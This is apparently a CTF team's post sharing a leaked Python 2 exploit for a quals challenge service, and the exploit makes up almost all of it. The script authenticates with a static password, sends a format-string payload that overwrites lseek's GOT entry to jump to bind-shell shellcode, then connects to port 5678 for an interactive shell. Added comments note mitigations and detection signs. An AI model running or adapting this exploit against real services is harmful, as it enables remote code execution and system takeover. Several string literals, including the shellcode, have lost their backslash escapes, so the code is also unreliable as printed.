CLGT did not solve this during the quals! Here is the exploit for the **esd2** leaked from pp200 (thanks beist for sharing). More analysis and a write-up for the real pp500 will come later:

#!/usr/bin/env python

import socket
import struct
import telnetlib
import time

# Address of the machine running the challenge service. 192.168.56.101 is an
# RFC 1918 private address (192.168.56.0/24 is the usual VirtualBox host-only
# range), so this presumably points at a local lab VM -- confirm.
HOST = '192.168.56.101'
# TCP port of the challenge service; the script connects to (HOST, PORT) below.
PORT = 8302

def xor_input(data):
    """XOR ``data`` character by character against a fixed key string.

    The character at index ``i`` of ``data`` is combined with the character
    at index ``i`` of the key, so applying the function twice to the same
    text gives that text back. Raises IndexError when ``data`` is longer
    than the key.
    """
    # NOTE(review): the key literals are reproduced exactly as published. They
    # look like "\n" and "\x00" escapes that lost their backslashes when the
    # page was extracted -- confirm against the original post.
    key = "%5d | %5dn" + "x00"*4
    return "".join(chr(ord(key[pos]) ^ ord(ch)) for pos, ch in enumerate(data))

# Open a plain TCP connection to the challenge service.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# send password
# A single static password is the only authentication step the script performs
# before it reaches the service's command handling.
# NOTE(review): the trailing "n" is presumably a "\n" escape that lost its
# backslash in extraction -- confirm against the original post.
s.send("sp3wn0w" + "n")

# prepare the payload
# overwrite lseek@plt, original value = 0x08048ae2
# NOTE(review): given that stored value, this is presumably lseek's GOT slot
# (the pointer the PLT stub jumps through) rather than the stub itself --
# confirm against the binary.
# Mitigation: the write depends on that slot being writable at run time; a
# full-RELRO link (-Wl,-z,relro,-z,now) maps it read-only.
target = 0x804a30c
# shellcode address = 0x0804a040 + 142 bytes (padding + fmt_string)
# 0x0804a040 + 142 = 0x0804a0ce. Nothing below reads `ret`; it only documents
# where write_byte comes from.
# Mitigation: a hard-coded absolute address only works for a binary loaded at
# a fixed base whose data region is executable; PIE with ASLR (-fPIE -pie) or
# a non-executable data segment (NX) each break this step.
ret = 0x0804a0ce
# value to write into target
# Low 16 bits of `ret`. Only the low half is overwritten (%hn is a 2-byte
# store) because the high half of the original value, 0x0804, already matches.
write_byte = 0xa0ce
# payload = target + padding(128 - 4) + 14 (fmt_string) + shellcode
# padding[4:] is used below, so the 4-byte address plus filler is 128 bytes.
padding = "A"*128
# "%<write_byte>u" pads the output to write_byte characters and "%24$hn"
# stores the running output count as a 16-bit value through the 24th argument
# (presumably the address at the start of the payload -- confirm).
# Root cause on the service side: attacker-influenced bytes evidently end up
# being used as a printf-style format string. A constant format string removes
# the %n primitive; glibc's -D_FORTIFY_SOURCE=2 also rejects %n in a format
# held in writable memory.
fmt_string = "%" + str(write_byte) + "u%24$hn"
# The format string is XORed with xor_input's fixed key before sending;
# presumably the service applies the same XOR on its side -- not shown here.
fmt_string = xor_input(fmt_string)

# bindshell: port 5678
# NOTE(review): as published this literal is plain ASCII text (the hex escapes
# appear to have lost their backslashes); it is kept exactly as on the page.
# Detection: a bind shell shows up as a new listening TCP socket (5678 here)
# owned by the service process; a host firewall that admits only the service
# port blocks the follow-up connection.
shellcode = "x00x29xc9x83xe9xecxd9xeexd9x74x24xf4x5bx81x73x13x63x7dxa9x09x83xebxfcxe2xf4x09x1cxf1x90x31x15xb9x0bx75x53x20xe8x31x3fxfbx4bx31x17xb9xc4xe3xe4x3ax58x30x2fxc3x61x3bxb0x29xb9x09xb0x29x5bx30x2fx19x17xaexfdx3ex63x61x24xc3x53x3bx2cxfex58xaexfdxe0x70x96x2dxc1x26x4cx0exc1x61x4cx1fxc0x67xeax9exf9x5dx30x2ex19x32xaexfdxa9x09"

# Layout: 4-byte little-endian target address, 124 filler bytes, the XORed
# format string, the shellcode literal, then a final terminator character.
payload = struct.pack("<L", target) + padding[4:] + fmt_string + shellcode + "n"

# Python 2 print statement: logs the payload bytes before they are sent.
print "Sending payload...", repr(payload)
# First message announces the blob: "c" followed by the payload length
# (presumably a create/store command -- the protocol is not shown here).
# NOTE(review): the bare "n" characters in these literals are presumably "\n"
# escapes that lost their backslashes in extraction -- confirm.
s.send("cn" + str(len(payload)) +"n")
s.send(payload)
# trigger the read_blob that calls lseek()
# The overwritten lseek entry is only used once the service handles this "r"
# request, so control flow is diverted at this point, not at the write.
s.send("rn" + "10n")

# Second stage: connect to the port named in the "bindshell" comment above.
# Detection: an inbound connection to a port the service did not listen on
# before (5678) is the observable sign that the payload ran.
print "Connecting to remote shell port 5678..."
# Fixed 4-second wait before connecting to the new port.
time.sleep(4)
# NOTE(review): telnetlib was removed from the standard library in
# Python 3.13; this script is Python 2 (print statements).
t = telnetlib.Telnet(HOST, 5678)
# Sends "id" so the first output identifies the account the service runs as;
# running the service as an unprivileged, sandboxed user limits what a
# successful exploit reaches.
# NOTE(review): "idnn" is presumably "id" plus two "\n" escapes -- confirm.
t.write("idnn")
# Hand the session over to the terminal until the user ends it.
t.interact()

# Close the shell connection, then the original service connection.
t.close()
s.close()